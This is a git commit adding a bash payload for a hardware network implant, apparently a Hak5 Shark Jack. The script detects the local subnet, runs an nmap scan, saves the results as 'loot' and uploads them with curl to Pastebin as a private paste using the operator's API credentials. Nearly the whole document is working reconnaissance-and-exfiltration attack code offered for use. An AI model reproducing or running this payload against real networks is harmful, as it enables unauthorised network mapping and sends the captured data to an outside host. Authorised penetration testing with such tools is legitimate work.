Payload based on example nmap payload but with pastebin ex-filtration (#5)
* Payload based on example nmap payload but with pastebin ex-filtration * Update payload.sh * refine directory name to remove spacespull/6/head
monsieurmarc
Marc
parent
a746d01726
commit
b627a6563c
|
|
@ -0,0 +1,104 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Sample Nmap Payload with Pastebin exfiltration
|
||||
# Author: MonsieurMarc (Based on the orignial HAK5 sample payload)
|
||||
# Version: 1.0
|
||||
#
|
||||
# Scans target subnet with Nmap using specified options. Saves each scan result
|
||||
# to loot storage folder and then uploads it to pastebin as a private paste.
|
||||
#This payload requires you to install curl via opkg
|
||||
#
|
||||
# Red ...........Setup
|
||||
# Amber..........Scanning
|
||||
# Green..........Finished
|
||||
#
|
||||
# See nmap --help for options. Default "-sP" ping scans the address space for
|
||||
# fast host discovery.
|
||||
#
|
||||
#Please enter your Pastebin.com details below
|
||||
#
|
||||
|
||||
NMAP_OPTIONS="-sP"
|
||||
LOOT_DIR=/root/loot/nmap
|
||||
SCAN_DIR=/etc/shark/nmap
|
||||
API_KEY='Enter your Pastebin.com API Key here'
|
||||
API_USER='Enter your Pastebin.com username here'
|
||||
API_PASSWORD='Enter your Pastebin.com password here'
|
||||
|
||||
|
||||
function finish() {
|
||||
LED CLEANUP
|
||||
# Kill Nmap
|
||||
wait $1
|
||||
kill $1 &> /dev/null
|
||||
|
||||
# Sync filesystem
|
||||
echo $SCAN_M > $SCAN_FILE
|
||||
sync
|
||||
sleep 1
|
||||
|
||||
#Login to Pastebin and get api key
|
||||
login
|
||||
|
||||
#Upload the loot as a paste
|
||||
pastebin
|
||||
sleep 1
|
||||
|
||||
LED FINISH
|
||||
sleep 1
|
||||
|
||||
# Halt system
|
||||
halt
|
||||
}
|
||||
|
||||
function setup() {
|
||||
LED SETUP
|
||||
# Create loot directory
|
||||
mkdir -p $LOOT_DIR &> /dev/null
|
||||
|
||||
# Create tmp scan directory
|
||||
mkdir -p $SCAN_DIR &> /dev/null
|
||||
|
||||
# Create tmp scan file if it doesn't exist
|
||||
SCAN_FILE=$SCAN_DIR/scan-count
|
||||
if [ ! -f $SCAN_FILE ]; then
|
||||
touch $SCAN_FILE && echo 0 > $SCAN_FILE
|
||||
fi
|
||||
|
||||
# Find IP address and subnet
|
||||
while [ -z "$SUBNET" ]; do
|
||||
sleep 1 && find_subnet
|
||||
done
|
||||
}
|
||||
|
||||
function find_subnet() {
|
||||
SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
|
||||
}
|
||||
|
||||
function run() {
|
||||
# Run setup
|
||||
setup
|
||||
|
||||
SCAN_N=$(cat $SCAN_FILE)
|
||||
SCAN_M=$(( $SCAN_N + 1 ))
|
||||
|
||||
LED ATTACK
|
||||
# Start scan
|
||||
nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$SCAN_M.txt &>/dev/null &
|
||||
tpid=$!
|
||||
finish $tpid
|
||||
}
|
||||
|
||||
function pastebin () {
|
||||
#Send the nmap scan file text to the pastebin via the api
|
||||
TEXT=$(<$LOOT_DIR/nmap-scan_$SCAN_M.txt)
|
||||
curl -d 'api_paste_code='"$TEXT"'' -d 'api_dev_key='"$API_KEY"'' -d 'api_user_key='"$LOGIN_KEY"'' -d 'api_option=paste' -d 'api_paste_private=2' 'http://pastebin.com/api/api_post.php'
|
||||
}
|
||||
|
||||
function login(){
|
||||
#Login to pastebin and get a login key
|
||||
LOGIN_KEY=$(echo | curl -d @- -d 'api_dev_key='"$API_KEY"'' -d 'api_user_name='"$API_USER"'' -d 'api_user_password='"$API_PASSWORD"'' 'https://pastebin.com/api/api_login.php')
|
||||
}
|
||||
|
||||
# Run payload
|
||||
run &
|
||||
Loading…
Reference in New Issue